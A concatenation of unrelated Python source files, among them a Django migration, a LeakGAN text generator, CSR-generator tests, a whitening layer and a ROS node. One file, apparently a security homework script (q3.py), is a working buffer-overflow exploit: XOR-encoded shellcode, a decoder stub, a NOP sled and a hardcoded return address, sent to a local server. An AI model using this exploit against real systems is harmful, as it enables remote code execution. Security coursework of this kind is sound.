                iterations.append(self.sudoku.current)
                # fresh solver per run so iteration counts are independent
                self.sudoku = solver.Sudoku(max_iterations=1000)
                self.sudoku.get_input(self.puzzle)
        print('--')
        print('after', len(iterations), 'runs')
        print('min iters:', str(min(iterations)) + ',',
              'max iters:', max(iterations))
        print('min time: ', str(round(min(times) * 1000, 2)) + ',',
              'max time:', round(max(times) * 1000, 2))
        print('average iters:', sum(iterations) / len(iterations))
        print('average time: ', round((sum(times) / len(times) * 1000), 2))
if __name__ == '__main__':
unittest.main(exit=False) | StarcoderdataPython |
3462959 | <reponame>pwgbots/presto<gh_stars>0
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2018-08-18 13:25
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated: drop QueuePicture.sender and add a nullable FK to Course."""

    dependencies = [
        ('presto', '0058_auto_20180816_1027'),
    ]

    operations = [
        # Remove the old sender relation ...
        migrations.RemoveField(
            model_name='queuepicture',
            name='sender',
        ),
        # ... and link queued pictures to a course instead (nullable, so
        # existing rows survive the migration).
        migrations.AddField(
            model_name='queuepicture',
            name='course',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='presto.Course'),
        ),
    ]
| StarcoderdataPython |
6634317 | <filename>HW4/q3.py
#!/usr/bin/python
import os, socket
import q2
import assemble
HOST = '127.0.0.1'  # target host running the vulnerable service
SERVER_PORT = 8000  # port the exploit connects to
LOCAL_PORT = 1337  # NOTE(review): not referenced anywhere below — dead constant?
ASCII_MAX = 0x7f  # highest ASCII byte; NOTE(review): also unreferenced below
def get_raw_shellcode():
    """Return the raw (pre-ASCII-encoding) shellcode byte string built by q2."""
    return q2.get_shellcode()
def get_shellcode():
    """Return an ASCII-safe copy of the raw shellcode.

    Every byte >= 0x80 is XORed with 0xFF so the payload contains only
    ASCII bytes; the decoder stub built in get_payload() XORs those same
    positions with bl=0xFF at runtime to restore the original bytes.
    (Python 2 code: xrange, byte strings.)
    """
    shellcode = get_raw_shellcode()
    shellcode_len = len(shellcode)
    new_shellcode = []
    # Assumes the shellcode is short enough to fit the payload buffer.
    for i in xrange(shellcode_len):
        byte = shellcode[i]
        if ord(byte) >= 0x80:
            # Flip high bytes into the ASCII range (reversible via XOR 0xFF).
            byte = chr(ord(byte)^0xff)
        new_shellcode.append(byte)
    return "".join(new_shellcode)
def get_payload():
    """Build the full exploit message: size header + NOP sled + decoder +
    ASCII-encoded shellcode + return address.

    The decoder walks EAX back to the start of the encoded shellcode and
    XORs with BL (0xFF) exactly the bytes that get_shellcode() flipped,
    restoring the original shellcode in place before it executes.
    """
    shellcode = get_shellcode() # ASCII-encoded shellcode (high bytes XORed)
    pre_shellcode = get_raw_shellcode() # raw shellcode, used to locate flipped bytes
    shellcode_len = len(shellcode) # encoding changes values only, never length
    # Point EAX just below ESP, at the first encoded shellcode byte.
    eax_at_start = "push esp\npop eax\n" + "dec eax\n" * (shellcode_len + 4)
    # BL := 0xFF (push 0; pop ebx; dec ebx) — the XOR key.
    set_bl = "push 0\npop ebx\ndec ebx\n"
    Decoder = eax_at_start + set_bl
    for i in xrange(shellcode_len):
        byte = pre_shellcode[i]
        if ord(byte) >= 0x80:
            # This position was flipped by the encoder; un-flip it at runtime.
            Decoder += "xor byte ptr [eax], bl\n"
        Decoder += "inc eax\n"
    return_address = "\x04\xe0\xff\xbf" # 0xbfffe040
    # inc edx is a safe 1-byte NOP here: the shellcode resets EDX before use.
    Decoder = assemble.assemble_data(Decoder)
    new_shellcode = Decoder + shellcode
    nop_silde_start = assemble.assemble_data("inc edx\n" * (1044 - len(return_address) - len(new_shellcode)))
    # Big-endian length header. NOTE(review): these bytes encode 0x0415 = 1045,
    # while the body below totals 1044 bytes — confirm the server's length
    # semantics (the comment claimed 1044).
    size = chr(0) * 2 + chr(4) + chr(21) # this is 1044, the size of the message I send
    to_send = size + nop_silde_start + new_shellcode + return_address
    return to_send
def main():
    """Connect to the vulnerable server and deliver the exploit payload."""
    payload = get_payload()
    conn = socket.socket()
    conn.connect((HOST, SERVER_PORT))
    try:
        conn.sendall(payload)
    finally:
        # Always release the socket, even if sendall fails.
        conn.close()
# Script entry point.
if __name__ == '__main__':
    main()
| StarcoderdataPython |
3285825 | # -*- coding: utf-8 -*-
# @Author : William
# @Project : TextGAN-william
# @FileName : LeakGAN_G.py
# @Time : Created at 2019-04-25
# @Blog : http://zhiweil.ml/
# @Description :
# Copyrights (C) 2018. All Rights Reserved.
import math
import time
import torch
import torch.nn as nn
import torch.nn.functional as F
import config as cfg
from utils.helpers import truncated_normal_
# Filter counts of the discriminator's parallel conv branches; the leaked
# feature vector is their concatenation, so goal_out_size equals their sum.
dis_num_filters = [100, 200, 200, 200, 200, 100, 100, 100, 100, 100, 160, 160]
goal_out_size = sum(dis_num_filters)
class LeakGAN_G(nn.Module):
    """LeakGAN generator: a Manager/Worker hierarchy.

    The Manager LSTM consumes the feature vector "leaked" from the
    discriminator and emits a goal vector; the Worker LSTM consumes the
    token embedding and emits per-token goal-conditioned logits. Token
    probabilities come from projecting the Worker output onto the current
    (transformed) goal.
    """

    def __init__(self, embedding_dim, hidden_dim, vocab_size, max_seq_len, padding_idx, goal_size,
                 step_size, gpu=False):
        super(LeakGAN_G, self).__init__()
        self.name = 'leakgan'

        self.hidden_dim = hidden_dim
        self.embedding_dim = embedding_dim
        self.max_seq_len = max_seq_len
        self.vocab_size = vocab_size
        self.padding_idx = padding_idx
        self.goal_size = goal_size
        self.goal_out_size = goal_out_size  # equals to total_num_filters
        self.step_size = step_size  # Manager goal refresh interval (in tokens)
        self.gpu = gpu

        self.temperature = 1.5  # softmax temperature used outside training

        self.embeddings = nn.Embedding(vocab_size, embedding_dim, padding_idx=padding_idx)
        self.worker = nn.LSTM(embedding_dim, hidden_dim)
        self.manager = nn.LSTM(goal_out_size, hidden_dim)

        self.work2goal = nn.Linear(hidden_dim, vocab_size * goal_size)
        self.mana2goal = nn.Linear(hidden_dim, goal_out_size)
        self.goal2goal = nn.Linear(goal_out_size, goal_size, bias=False)

        # Learnable initial goal, one row per batch element.
        self.goal_init = nn.Parameter(torch.rand((cfg.batch_size, goal_out_size)))

        self.init_params()

    def forward(self, idx, inp, work_hidden, mana_hidden, feature, real_goal, no_log=False, train=False):
        """
        Embeds input and sample on token at a time (seq_len = 1)
        :param idx: index of current token in sentence
        :param inp: [batch_size]
        :param work_hidden: 1 * batch_size * hidden_dim
        :param mana_hidden: 1 * batch_size * hidden_dim
        :param feature: 1 * batch_size * total_num_filters, feature of current sentence
        :param real_goal: batch_size * goal_out_size, real_goal in LeakGAN source code
        :param no_log: no log operation
        :param train: if train
        :return: out, cur_goal, work_hidden, mana_hidden
            - out: batch_size * vocab_size
            - cur_goal: batch_size * 1 * goal_out_size
        """
        emb = self.embeddings(inp).unsqueeze(0)  # 1 * batch_size * embed_dim

        # Manager
        mana_out, mana_hidden = self.manager(feature, mana_hidden)  # mana_out: 1 * batch_size * hidden_dim
        mana_out = self.mana2goal(mana_out.permute([1, 0, 2]))  # batch_size * 1 * goal_out_size
        cur_goal = F.normalize(mana_out, dim=-1)
        _real_goal = self.goal2goal(real_goal)  # batch_size * goal_size
        _real_goal = F.normalize(_real_goal, p=2, dim=-1).unsqueeze(-1)  # batch_size * goal_size * 1

        # Worker
        work_out, work_hidden = self.worker(emb, work_hidden)  # work_out: 1 * batch_size * hidden_dim
        work_out = self.work2goal(work_out).view(-1, self.vocab_size,
                                                 self.goal_size)  # batch_size * vocab_size * goal_size

        # Sample token
        out = torch.matmul(work_out, _real_goal).squeeze(-1)  # batch_size * vocab_size

        # Temperature control
        # NOTE(review): for idx > 1 during training the temperature is 1.0,
        # otherwise self.temperature is applied.
        if idx > 1:
            if train:
                temperature = 1.0
            else:
                temperature = self.temperature
        else:
            temperature = self.temperature

        out = temperature * out

        if no_log:
            out = F.softmax(out, dim=-1)
        else:
            out = F.log_softmax(out, dim=-1)

        return out, cur_goal, work_hidden, mana_hidden

    def sample(self, num_samples, batch_size, dis, start_letter=cfg.start_letter, train=False):
        """
        Samples the network and returns num_samples samples of length max_seq_len.
        :return: samples: batch_size * max_seq_len
        """
        num_batch = num_samples // batch_size + 1 if num_samples != batch_size else 1
        samples = torch.zeros(num_batch * batch_size, self.max_seq_len).long()  # larger than num_samples
        fake_sentences = torch.zeros((batch_size, self.max_seq_len))

        for b in range(num_batch):
            leak_sample, _, _, _ = self.forward_leakgan(fake_sentences, dis, if_sample=True, no_log=False
                                                        , start_letter=start_letter, train=False)

            assert leak_sample.shape == (batch_size, self.max_seq_len)
            samples[b * batch_size:(b + 1) * batch_size, :] = leak_sample

        samples = samples[:num_samples, :]

        return samples  # cut to num_samples

    def pretrain_loss(self, target, dis, start_letter=cfg.start_letter):
        """
        Returns the pretrain_generator Loss for predicting target sequence.
        Inputs: target, dis, start_letter
            - target: batch_size * seq_len
        """
        batch_size, seq_len = target.size()

        _, feature_array, goal_array, leak_out_array = self.forward_leakgan(target, dis, if_sample=False, no_log=False,
                                                                            start_letter=start_letter)

        # Manager loss
        mana_cos_loss = self.manager_cos_loss(batch_size, feature_array,
                                              goal_array)  # batch_size * (seq_len / step_size)
        manager_loss = -torch.sum(mana_cos_loss) / (batch_size * (seq_len // self.step_size))
        # Worker loss
        work_nll_loss = self.worker_nll_loss(target, leak_out_array)  # batch_size * seq_len
        work_loss = torch.sum(work_nll_loss) / (batch_size * seq_len)

        return manager_loss, work_loss

    def adversarial_loss(self, target, rewards, dis, start_letter=cfg.start_letter):
        """
        Returns a pseudo-loss that gives corresponding policy gradients (on calling .backward()).
        Inspired by the example in http://karpathy.github.io/2016/05/31/rl/
        Inputs: target, rewards, dis, start_letter
            - target: batch_size * seq_len
            - rewards: batch_size * seq_len (discriminator rewards for each token)
        """
        batch_size, seq_len = target.size()

        _, feature_array, goal_array, leak_out_array = self.forward_leakgan(target, dis, if_sample=False, no_log=False,
                                                                            start_letter=start_letter, train=True)

        # Manager Loss
        # NOTE(review): t0 is assigned but never used — leftover timing code.
        t0 = time.time()
        mana_cos_loss = self.manager_cos_loss(batch_size, feature_array,
                                              goal_array)  # batch_size * (seq_len / step_size)
        mana_loss = -torch.sum(rewards * mana_cos_loss) / (batch_size * (seq_len // self.step_size))
        # Worker Loss
        work_nll_loss = self.worker_nll_loss(target, leak_out_array)  # batch_size * seq_len
        work_cos_reward = self.worker_cos_reward(feature_array, goal_array)  # batch_size * seq_len
        work_loss = -torch.sum(work_nll_loss * work_cos_reward) / (batch_size * seq_len)

        return mana_loss, work_loss

    def manager_cos_loss(self, batch_size, feature_array, goal_array):
        """
        Get manager cosine distance loss
        :return cos_loss: batch_size * (seq_len / step_size)
        """
        # ===My implements===
        # offset_feature = feature_array[:, 4:, :]
        # # do not track the change of the last four features
        # all_feature = feature_array[:, :-4, :]
        # all_goal = goal_array[:, :-4, :]
        # sub_feature = offset_feature - all_feature
        #
        # # L2 normalization
        # sub_feature = F.normalize(sub_feature, p=2, dim=-1)
        # all_goal = F.normalize(all_goal, p=2, dim=-1)
        #
        # cos_loss = F.cosine_similarity(sub_feature, all_goal, dim=-1)  # batch_size * (seq_len - 4)
        #
        # return cos_loss

        # ===LeakGAN origin===
        # get sub_feature and real_goal
        # batch_size, seq_len = sentences.size()
        sub_feature = torch.zeros(batch_size, self.max_seq_len // self.step_size, self.goal_out_size)
        real_goal = torch.zeros(batch_size, self.max_seq_len // self.step_size, self.goal_out_size)
        for i in range(self.max_seq_len // self.step_size):
            idx = i * self.step_size
            # feature delta across one full manager step
            sub_feature[:, i, :] = feature_array[:, idx + self.step_size, :] - feature_array[:, idx, :]

            if i == 0:
                real_goal[:, i, :] = self.goal_init[:batch_size, :]
            else:
                idx = (i - 1) * self.step_size + 1
                real_goal[:, i, :] = torch.sum(goal_array[:, idx:idx + 4, :], dim=1)

        # L2 noramlization
        sub_feature = F.normalize(sub_feature, p=2, dim=-1)
        real_goal = F.normalize(real_goal, p=2, dim=-1)

        cos_loss = F.cosine_similarity(sub_feature, real_goal, dim=-1)

        return cos_loss

    def worker_nll_loss(self, target, leak_out_array):
        """
        Get NLL loss for worker
        :return loss: batch_size * seq_len
        """
        loss_fn = nn.NLLLoss(reduction='none')
        loss = loss_fn(leak_out_array.permute([0, 2, 1]), target)

        return loss

    def worker_cos_reward(self, feature_array, goal_array):
        """
        Get reward for worker (cosine distance)
        :return: cos_loss: batch_size * seq_len
        """
        # Broadcast each step's starting feature and summed goal over the
        # whole step window before computing the per-token cosine.
        for i in range(int(self.max_seq_len / self.step_size)):
            real_feature = feature_array[:, i * self.step_size, :].unsqueeze(1).expand((-1, self.step_size, -1))
            feature_array[:, i * self.step_size:(i + 1) * self.step_size, :] = real_feature
            if i > 0:
                sum_goal = torch.sum(goal_array[:, (i - 1) * self.step_size:i * self.step_size, :], dim=1, keepdim=True)
            else:
                sum_goal = goal_array[:, 0, :].unsqueeze(1)
            goal_array[:, i * self.step_size:(i + 1) * self.step_size, :] = sum_goal.expand((-1, self.step_size, -1))

        offset_feature = feature_array[:, 1:, :]  # f_{t+1}, batch_size * seq_len * goal_out_size
        goal_array = goal_array[:, :self.max_seq_len, :]  # batch_size * seq_len * goal_out_size
        sub_feature = offset_feature - goal_array

        # L2 normalization
        sub_feature = F.normalize(sub_feature, p=2, dim=-1)
        all_goal = F.normalize(goal_array, p=2, dim=-1)

        cos_loss = F.cosine_similarity(sub_feature, all_goal, dim=-1)  # batch_size * seq_len

        return cos_loss

    def forward_leakgan(self, sentences, dis, if_sample, no_log=False, start_letter=cfg.start_letter, train=False):
        """
        Get all feature and goals according to given sentences
        :param sentences: batch_size * max_seq_len, not include start token
        :param dis: discriminator model
        :param if_sample: if use to sample token
        :param no_log: if use log operation
        :param start_letter:
        :param train: if use temperature parameter
        :return samples, feature_array, goal_array, leak_out_array:
            - samples: batch_size * max_seq_len
            - feature_array: batch_size * (max_seq_len + 1) * total_num_filter
            - goal_array: batch_size * (max_seq_len + 1) * goal_out_size
            - leak_out_array: batch_size * max_seq_len * vocab_size
        """
        batch_size, seq_len = sentences.size()

        feature_array = torch.zeros((batch_size, seq_len + 1, self.goal_out_size))
        goal_array = torch.zeros((batch_size, seq_len + 1, self.goal_out_size))
        leak_out_array = torch.zeros((batch_size, seq_len + 1, self.vocab_size))

        samples = torch.zeros(batch_size, seq_len + 1).long()
        work_hidden = self.init_hidden(batch_size)
        mana_hidden = self.init_hidden(batch_size)
        leak_inp = torch.LongTensor([start_letter] * batch_size)
        # dis_inp = torch.LongTensor([start_letter] * batch_size)
        real_goal = self.goal_init[:batch_size, :]

        if self.gpu:
            feature_array = feature_array.cuda()
            goal_array = goal_array.cuda()
            leak_out_array = leak_out_array.cuda()

        goal_array[:, 0, :] = real_goal  # g0 = goal_init
        for i in range(seq_len + 1):
            # Get feature
            if if_sample:
                dis_inp = samples[:, :seq_len]
            else:  # to get feature and goal
                dis_inp = torch.zeros(batch_size, seq_len).long()
                if i > 0:
                    dis_inp[:, :i] = sentences[:, :i]  # cut sentences
                    leak_inp = sentences[:, i - 1]

            if self.gpu:
                dis_inp = dis_inp.cuda()
                leak_inp = leak_inp.cuda()
            feature = dis.get_feature(dis_inp).unsqueeze(0)  # !!!note: 1 * batch_size * total_num_filters

            feature_array[:, i, :] = feature.squeeze(0)

            # Get output of one token
            # cur_goal: batch_size * 1 * goal_out_size
            out, cur_goal, work_hidden, mana_hidden = self.forward(i, leak_inp, work_hidden, mana_hidden, feature,
                                                                   real_goal, no_log=no_log, train=train)
            leak_out_array[:, i, :] = out

            # ===My implement according to paper===
            # Update real_goal and save goal
            # if 0 < i < 4:  # not update when i=0
            #     real_goal = torch.sum(goal_array, dim=1)  # num_samples * goal_out_size
            # elif i >= 4:
            #     real_goal = torch.sum(goal_array[:, i - 4:i, :], dim=1)
            # if i > 0:
            #     goal_array[:, i, :] = cur_goal.squeeze(1)  # !!!note: save goal after update last_goal

            # ===LeakGAN origin===
            # Save goal and update real_goal
            goal_array[:, i, :] = cur_goal.squeeze(1)
            if i > 0 and i % self.step_size == 0:
                real_goal = torch.sum(goal_array[:, i - 3:i + 1, :], dim=1)
                if i / self.step_size == 1:
                    real_goal += self.goal_init[:batch_size, :]

            # Sample one token
            if not no_log:
                out = torch.exp(out)
            out = torch.multinomial(out, 1).view(-1)  # [batch_size] (sampling from each row)
            samples[:, i] = out.data
            leak_inp = out

        # cut to seq_len
        samples = samples[:, :seq_len]
        leak_out_array = leak_out_array[:, :seq_len, :]

        return samples, feature_array, goal_array, leak_out_array

    def batchNLLLoss(self, target, dis, start_letter=cfg.start_letter):
        """Mean worker NLL over a batch of target sequences."""
        # loss_fn = nn.NLLLoss()
        # batch_size, seq_len = target.size()

        _, _, _, leak_out_array = self.forward_leakgan(target, dis, if_sample=False, no_log=False,
                                                       start_letter=start_letter)

        nll_loss = torch.mean(self.worker_nll_loss(target, leak_out_array))

        return nll_loss

    def init_hidden(self, batch_size=1):
        """Zero (h, c) LSTM state, moved to GPU when self.gpu is set."""
        h = torch.zeros(1, batch_size, self.hidden_dim)
        c = torch.zeros(1, batch_size, self.hidden_dim)

        if self.gpu:
            return h.cuda(), c.cuda()
        else:
            return h, c

    def init_goal(self, batch_size):
        """Fresh learnable goal parameter (normal, std=0.1)."""
        goal = torch.rand((batch_size, self.goal_out_size)).normal_(std=0.1)
        goal = nn.Parameter(goal)

        if self.gpu:
            return goal.cuda()
        else:
            return goal

    def split_params(self):
        """Split parameters into (manager, worker) groups for separate optimizers."""
        mana_params = list()
        work_params = list()

        mana_params += list(self.manager.parameters())
        mana_params += list(self.mana2goal.parameters())
        mana_params.append(self.goal_init)

        work_params += list(self.embeddings.parameters())
        work_params += list(self.worker.parameters())
        work_params += list(self.work2goal.parameters())
        work_params += list(self.goal2goal.parameters())

        return mana_params, work_params

    def init_params(self):
        """Initialize all parameters per cfg.gen_init (uniform/normal/truncated)."""
        for param in self.parameters():
            if param.requires_grad and len(param.shape) > 0:
                stddev = 1 / math.sqrt(param.shape[0])
                if cfg.gen_init == 'uniform':
                    torch.nn.init.uniform_(param, a=-0.05, b=0.05)
                elif cfg.gen_init == 'normal':
                    torch.nn.init.normal_(param, std=stddev)
                elif cfg.gen_init == 'truncated_normal':
                    truncated_normal_(param, std=stddev)
| StarcoderdataPython |
4998351 | import mock
from unittest import TestCase
from ncssl_api_client.services.crypto.csr_generator import CsrGenerator
class CsrGeneratorTest(TestCase):
    """Verifies the openssl command lines CsrGenerator builds for keys/CSRs."""

    @mock.patch('ncssl_api_client.services.crypto.csr_generator.Utils')
    def test_generates_private_key(self, utils_mock):
        """Unencrypted key: plain `openssl genrsa` with the configured size."""
        crypto_config_mock = mock.MagicMock()
        crypto_config_mock.get_key_size.return_value = 2048
        crypto_config_mock.key_encryption_enabled.return_value = False
        crypto_config_mock.get_subject.return_value = {}
        # Dots in the CN become underscores in the generated file names.
        utils_mock.normalize_cn = lambda x: x.replace('.', '_')
        utils_mock.get_cert_dir.return_value = ''
        utils_mock.update_path.return_value = None
        with mock.patch('ncssl_api_client.services.crypto.csr_generator.CsrGenerator.openssl_exec') as openssl_exec_mock:
            csr_generator = CsrGenerator(crypto_config_mock)
            csr_generator.generate_csr('test.example.com')
            self.assertEqual(csr_generator.openssl_exec.call_args_list[0],
                             mock.call(['genrsa', '-out', '/test_example_com.key', '2048']))

    @mock.patch('ncssl_api_client.services.crypto.csr_generator.Utils')
    def test_generates_encrypted_private_key(self, utils_mock):
        """Encrypted key: the cipher flag (-aes256) precedes -out."""
        crypto_config_mock = mock.MagicMock()
        crypto_config_mock.get_key_size.return_value = 2048
        crypto_config_mock.key_encryption_enabled.return_value = True
        crypto_config_mock.get_subject.return_value = {}
        crypto_config_mock.get_key_encryption_algorithm.return_value = '-aes256'
        utils_mock.normalize_cn = lambda x: x.replace('.', '_')
        utils_mock.get_cert_dir.return_value = ''
        utils_mock.update_path.return_value = None
        with mock.patch('ncssl_api_client.services.crypto.csr_generator.CsrGenerator.openssl_exec') as openssl_exec_mock:
            csr_generator = CsrGenerator(crypto_config_mock)
            csr_generator.generate_csr('test.example.com')
            self.assertEqual(csr_generator.openssl_exec.call_args_list[0],
                             mock.call(['genrsa', '-aes256', '-out', '/test_example_com.key', '2048']))

    @mock.patch('ncssl_api_client.services.crypto.csr_generator.Utils')
    def test_generates_csr(self, utils_mock):
        """CSR request: second openssl call is `req -new` against the key."""
        crypto_config_mock = mock.MagicMock()
        crypto_config_mock.get_key_size.return_value = 2048
        crypto_config_mock.key_encryption_enabled.return_value = False
        crypto_config_mock.get_subject.return_value = {}
        utils_mock.normalize_cn = lambda x: x.replace('.', '_')
        utils_mock.get_cert_dir.return_value = ''
        utils_mock.update_path.return_value = None
        with mock.patch('ncssl_api_client.services.crypto.csr_generator.CsrGenerator.openssl_exec') as openssl_exec_mock:
            csr_generator = CsrGenerator(crypto_config_mock)
            csr_generator.generate_csr('test.example.com')
            self.assertEqual(csr_generator.openssl_exec.call_args_list[1],
                             mock.call(['req', '-new', '-key', '/test_example_com.key', '-out', '/test_example_com.csr', '-subj', '/']))
| StarcoderdataPython |
8195852 | <gh_stars>0
# Classic "make N into 1" DP (subtract 1, divide by 2, or divide by 3):
# dp[i] = minimum number of operations to reduce i to 1.
n = int(input())
# build the DP table
dp = [0] * (n+1)
# fill it bottom-up
for i in range(2,n+1):
    # base case: one "subtract 1" step from the previous value
    dp[i] = dp[i-1] + 1
    # divisible by both 2 and 3: compare all three candidates
    if i % 6 == 0:
        dp[i] = min(dp[i//3]+1, dp[i//2]+1, dp[i])
    # divisible by 3 only: compare the two candidates
    elif i % 3 == 0:
        dp[i] = min(dp[i//3]+1, dp[i])
    # divisible by 2 only: compare the two candidates
    elif i % 2 == 0:
        dp[i] = min(dp[i//2]+1, dp[i])
print(dp[n])
| StarcoderdataPython |
1939082 | import torch
import torch.nn as nn
import numpy as np
def get_corrcoef(x):
    """Mean absolute off-diagonal correlation between the columns of *x*.

    Accepts a numpy array or any torch.Tensor (including subclasses such as
    nn.Parameter); tensors are detached and moved to CPU first.

    Bug fix: the original `type(x) is torch.Tensor` check missed Tensor
    subclasses, so an nn.Parameter reached np.corrcoef while still requiring
    grad and raised; isinstance() handles the whole Tensor hierarchy.
    """
    if isinstance(x, torch.Tensor):
        x = x.detach().cpu().numpy()
    corr_mat = np.corrcoef(x, rowvar=False)
    # zero the self-correlations so only cross-feature terms are averaged
    np.fill_diagonal(corr_mat, 0)
    return np.abs(corr_mat).mean()
class MemoryWhitening1d(nn.Module):
    """ZCA-style whitening over feature dimension with EMA-smoothed statistics.

    Centers the batch with a running mean, smooths the covariance with the
    same momentum, and applies the whitening transform U S^{-1/2} U^T built
    from the covariance eigendecomposition.

    NOTE(review): with momentum=0.9 the *current batch* gets weight 0.9 —
    the opposite of the usual BatchNorm momentum convention; confirm intent.
    NOTE(review): torch.symeig is deprecated (removed in recent PyTorch);
    torch.linalg.eigh is the modern equivalent, but switching would drop
    support for old torch versions.
    """
    def __init__(self, num_features, shuffle=False, momentum=0.9):
        super(MemoryWhitening1d, self).__init__()
        self.num_features = num_features
        self.momentum = momentum
        # Buffers start as None and are lazily filled on the first forward.
        # self.register_buffer("running_mean", torch.zeros(self.num_features))
        self.register_buffer('running_mean', None)
        # self.register_buffer("running_covariance", torch.eye(self.num_features))
        self.register_buffer('running_covariance', None)
        self.x_last_batch = None
        # NOTE(review): `shuffle` is stored but never used in this class.
        self.shuffle = shuffle

    def forward(self, x):
        N = x.shape[0]
        # if self.x_last_batch is None:
        #     self.x_last_batch = torch.randn_like(x)
        # x, self.x_last_batch = torch.cat([x, self.x_last_batch]), x.detach()
        mean = x.mean(dim=0)
        if self.running_mean is None:
            self.running_mean = mean
        else:
            # EMA update of the mean; the smoothed value is used for centering.
            mean = self.running_mean = (1. - self.momentum) * self.running_mean.detach() + self.momentum * mean
        x = x - mean
        # import pdb
        # pdb.set_trace()
        cov = x.t().matmul(x) / (x.size(0) - 1)
        if self.running_covariance is None:
            self.running_covariance = cov
        else:
            cov = self.running_covariance = (1 - self.momentum) * self.running_covariance.detach() + self.momentum * cov
        # Eigendecomposition is done on CPU, then moved back to x's device.
        eigenvalues, eigenvectors = torch.symeig(cov.cpu(), eigenvectors=True, upper=True)
        S, U = eigenvalues.to(x.device), eigenvectors.to(x.device)
        self.eig = eigenvalues.min()
        whitening_transform = U.matmul(S.rsqrt().diag()).matmul(U.t())
        return x.matmul(whitening_transform)
if __name__ == "__main__":
    # Smoke test: whitening should drive the mean absolute cross-feature
    # correlation toward zero.
    batch_size = 512
    num_features = 512
    # Bug fix: the demo referenced `DecorrelatedNorm`, which is not defined
    # anywhere in this module (NameError at runtime). Use the class defined
    # above instead.
    dn = MemoryWhitening1d(num_features)
    x = torch.randn((batch_size * 2, num_features), requires_grad=True)
    print(get_corrcoef(x))
    y = dn(x)
    print(y)
    print(get_corrcoef(y))
    y.mean().backward()
    # A second pass exercises the running-statistics branch.
    x = torch.randn((batch_size * 2, num_features), requires_grad=True)
    y = dn(x)
    y.mean().backward()
| StarcoderdataPython |
3574500 | <filename>dassl/data/datasets/base_dataset.py
import os
import tarfile
import zipfile
from dassl.utils import check_isfile
import gdown
import os.path as osp
class Datum:
    """Data instance which defines the basic attributes.

    Args:
        impath (str, list, tuple): image path.
        label (int): class label.
        domain (int): domain label.
        classname (str): class name.
    """

    def __init__(self, impath='', label=0, domain=-1, classname=''):
        assert isinstance(impath, (str, list, tuple))
        # assert isinstance(label, int)
        assert isinstance(domain, int)
        assert isinstance(classname, str)
        # A sequence of paths is accepted; every entry must be an existing file.
        if isinstance(impath, (list, tuple)):
            assert all([check_isfile(fpath) for fpath in impath])
        else:
            assert check_isfile(impath)
        self._impath = impath
        self._label = label
        self._domain = domain
        self._classname = classname

    @property
    def impath(self):
        # image path (str) or paths (list/tuple of str)
        return self._impath

    @property
    def label(self):
        # class label
        return self._label

    @property
    def domain(self):
        # domain label (-1 when not applicable)
        return self._domain

    @property
    def classname(self):
        # human-readable class name
        return self._classname
class DatasetBase:
    """A unified dataset class for

    1) domain adaptation
    2) domain generalization
    3) semi-supervised learning

    Holds labeled/unlabeled train splits plus optional val/test splits.
    The number of classes and the label->classname mapping are derived from
    the labeled training data, unless an explicit output count is supplied
    (regression mode).
    """

    dataset_dir = ''  # directory which contains the dataset
    domains = []  # string names of all domains

    def __init__(self, train_x=None, train_u=None, val=None, test=None, outputs=None):
        self._train_x = train_x  # labeled training data
        self._train_u = train_u  # unlabeled training data (optional)
        self._val = val  # validation data (optional)
        self._test = test  # test data
        if outputs:
            # Regression mode: `outputs` fixes the number of outputs and
            # there is no label->classname mapping.
            self.set_num_classes(outputs)
            self._lab2cname = None
        else:
            self._num_classes = self.get_num_classes(train_x)
            self._lab2cname = self.get_label_classname_mapping(train_x)

    @property
    def train_x(self):
        return self._train_x

    @property
    def train_u(self):
        return self._train_u

    @property
    def val(self):
        return self._val

    @property
    def test(self):
        return self._test

    @property
    def lab2cname(self):
        return self._lab2cname

    @property
    def num_classes(self):
        return self._num_classes

    def set_num_classes(self, int):
        # NOTE(review): the parameter shadows the builtin `int`; renaming it
        # would break keyword callers, so it is kept but flagged for cleanup.
        self._num_classes = int

    def get_num_classes(self, data_source):
        """Return max label + 1 over *data_source* (items expose `.label`).

        Raises ValueError on an empty data source (max of empty set).
        """
        label_set = set()
        for item in data_source:
            label_set.add(item.label)
        return max(label_set) + 1

    def get_label_classname_mapping(self, data_source):
        """Map each label found in *data_source* to its classname."""
        tmp = set()
        for item in data_source:
            tmp.add((item.label, item.classname))
        mapping = {label: classname for label, classname in tmp}
        return mapping

    def check_input_domains(self, source_domains, target_domains):
        """Validate both the source and target domain name lists."""
        self.is_input_domain_valid(source_domains)
        self.is_input_domain_valid(target_domains)

    def is_input_domain_valid(self, input_domains):
        """Raise ValueError if any name is not a declared domain."""
        for domain in input_domains:
            if domain not in self.domains:
                raise ValueError(
                    'Input domain must belong to {}, '
                    'but got [{}]'.format(self.domains, domain)
                )

    def download_data(self, url, dst, from_gdrive=True):
        """Download an archive to *dst* and extract it next to itself.

        Extraction tries tar first and falls back to zip.
        """
        if not osp.exists(osp.dirname(dst)):
            os.makedirs(osp.dirname(dst))

        if from_gdrive:
            gdown.download(url, dst, quiet=False)
        else:
            raise NotImplementedError

        print('Extracting file ...')

        # Bug fix: the original bare `except:` also swallowed SystemExit and
        # KeyboardInterrupt. Catching Exception keeps the tar->zip fallback
        # while letting control-flow exceptions propagate.
        try:
            tar = tarfile.open(dst)
            tar.extractall(path=osp.dirname(dst))
            tar.close()
        except Exception:
            zip_ref = zipfile.ZipFile(dst, 'r')
            zip_ref.extractall(osp.dirname(dst))
            zip_ref.close()

        print('File extracted to {}'.format(osp.dirname(dst)))
| StarcoderdataPython |
11373436 | import rclpy
from sensor_battery import battery_data_publisher_node as node
def main(args=None):
    """ROS 2 entry point: spin the battery data publisher until shutdown."""
    rclpy.init(args=args)
    # Construct the publisher
    battery_data_publisher = node.BatteryDataPublisher()
    # Reading and publishing data at defined rate (2 seconds)
    # NOTE(review): the 2-second rate is presumably configured inside
    # BatteryDataPublisher — confirm against that class.
    rclpy.spin(battery_data_publisher)
    # Clean up when script is stopped
    battery_data_publisher.destroy_node()
    rclpy.shutdown()
if __name__ == '__main__':
main() | StarcoderdataPython |
1998591 | <filename>CSCE/12.8.20/BankAccount.py<gh_stars>1-10
class BankAccount():
    """A minimal interactive bank account.

    Holds an account number and a balance; :meth:`Check` prompts the
    operator for the account number and prints the balance on a match.
    """

    def __init__(self, accountnumber, balance):
        self.accountnumber = accountnumber
        self.balance = balance

    def Check(self):
        # Ask for the account number and compare against the stored one.
